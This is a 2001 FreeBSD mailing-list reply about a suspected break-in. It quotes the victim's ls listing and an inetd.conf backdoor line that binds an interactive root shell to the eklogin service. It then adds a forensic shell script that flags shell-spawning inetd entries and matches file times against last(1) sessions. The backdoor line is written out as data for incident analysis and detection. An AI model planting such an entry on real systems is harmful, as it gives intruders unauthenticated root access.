From owner-freebsd-questions Thu Oct 18 13:30:36 2001
Delivered-To: freebsd-questions@freebsd.org
Received: from 4evermail.com (equinox.4evermail.com [204.92.209.4]) by hub.freebsd.org (Postfix) with SMTP id 3353637B408 for ; Thu, 18 Oct 2001 13:30:31 -0700 (PDT)
Received: (qmail 71464 invoked from network); 18 Oct 2001 20:31:37 -0000
Received: from equinox.4evermail.com (HELO mail.4evermail.com) (nobody@204.92.209.4) by equinox.4evermail.com with SMTP; 18 Oct 2001 20:31:37 -0000
From: jslivko@4evermail.com
To:
Cc: freebsd-questions@freebsd.org, freebsd-security@freebsd.org
Subject: Re: I got hacked, I think
Date: Thu, 18 Oct 2001 16:31:37 +0000
X-Mailer: Null Webmail / 0.5.9
Message-Id: <20011018203031.3353637B408@hub.freebsd.org>
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.ORG

[CC'd to -security, as this should be discussed there]

Did you have any system snoopers around that you installed (tripwire and things of that ilk) that you can refer to for time information? If you can narrow down the time that the files were updated, you might have found out when the intrusion actually occurred and then, by grepping that information from "last", you can find out who he logged in as (assuming he logged in normally the first time).

If I can be of any help, feel free to shoot me an e-mail.

-- Jonathan

--- "Tomek" wrote:
> I found out more info.
>
> -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
> -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
>
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream tcp nowait root /bin/sh sh -i
>
> I take it that "sh" would not even request a login or anything if called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... who did he even log in as the first time, maybe it was some
> buffer overflow or something.... yuck.
>
> TY for all your help guys, you are all wonderful! I will leave you in
> peace now (I hope). I still don't know about Broot though...
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
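The reply above suggests correlating the mtimes of the dropped files with last(1), and the quoted ls -l and inetd.conf lines show what a backdoored inetd entry looks like. The script below is an added example, not something posted in this thread: it flags inetd.conf entries that hand a raw shell to the network, and lists the last(1) sessions that were open at a given mtime. The inetd.conf and last(1) output it parses are constructed samples (the hosts, user names and session times are invented; only the eklogin line and the Sep 26 timestamps come from the thread), and it assumes FreeBSD's last(1) column layout.

```sh
#!/bin/sh
# Added example, not from the original thread. Two checks for the situation
# above: (1) find inetd.conf entries that expose a shell to the network,
# (2) list the last(1) sessions that were open at a given file mtime.
# All input below is constructed; hosts, user names and times are made up.

# Constructed inetd.conf: normal FreeBSD 4.x entries plus the backdoor line
# quoted in the thread.
SAMPLE_INETD='#
# constructed sample, not a real /etc/inetd.conf
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
auth    stream  tcp     nowait  root    internal
eklogin stream  tcp     nowait  root    /bin/sh sh -i'

# Print "service:user:program" for entries whose server program is a shell,
# or whose arguments contain "-i" (interactive shell). inetd.conf fields:
# service socktype proto wait/nowait user[:group] server-program [args...]
flag_inetd_shells() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/ { next }                     # comment line
        NF == 0    { next }                     # blank line
        $6 == "internal" { next }               # built-in service, no program
        {
            prog = $6
            base = prog; sub(/.*\//, "", base)  # basename of the server program
            shell = (base == "sh" || base == "csh" || base == "bash" ||
                     base == "ksh" || base == "tcsh")
            interactive = 0
            for (i = 7; i <= NF; i++) if ($i == "-i") interactive = 1
            if (shell || interactive) print $1 ":" $5 ":" prog
        }'
}

# Constructed last(1) output in FreeBSD layout; the "still logged in" and
# "reboot" lines exercise the two shapes that differ from a closed session.
SAMPLE_LAST='tomek    ttyp0    10.0.0.5         Wed Sep 26 10:20 - 10:40  (00:20)
root     ttyp1    192.0.2.44       Wed Sep 26 10:22 - 10:31  (00:09)
intruder ttyp2    192.0.2.44       Wed Sep 26 21:30   still logged in
reboot   ~                         Wed Sep 26 09:00
tomek    ttyp0    10.0.0.5         Tue Sep 25 22:10 - 22:30  (00:20)'

# Print "user@host tty" for every session open at month/day/HH:MM, e.g. the
# mtime of a file the intruder dropped. Usage: logins_at "$last_out" Sep 26 10:24
logins_at() {
    printf '%s\n' "$1" | awk -v mon="$2" -v day="$3" -v at="$4" '
        function mins(t,  a) { split(t, a, ":"); return a[1] * 60 + a[2] }
        $1 == "reboot" || $1 == "shutdown" { next }   # not user sessions
        $5 == mon && $6 == day {
            start = mins($7)
            end = ($8 == "-") ? mins($9) : 24 * 60     # "still logged in": open
            if (end < start) end += 24 * 60            # session crossed midnight
            t = mins(at)
            if (t >= start && t <= end) print $1 "@" $3 " " $2
        }'
}

# Stand-alone run: the backdoor service, then who was on at the two mtimes
# from the ls -l listing above (10:24 for /inetd.conf, 21:38 for the tarball).
flag_inetd_shells "$SAMPLE_INETD"
logins_at "$SAMPLE_LAST" Sep 26 10:24
logins_at "$SAMPLE_LAST" Sep 26 21:38
```

Treat the output as leads, not proof: an entry that runs as root means the intruder is root, and root can rewrite both wtmp (what last(1) reads) and file mtimes, so a tripwire database kept off the box is the only timestamp source that is not under his control.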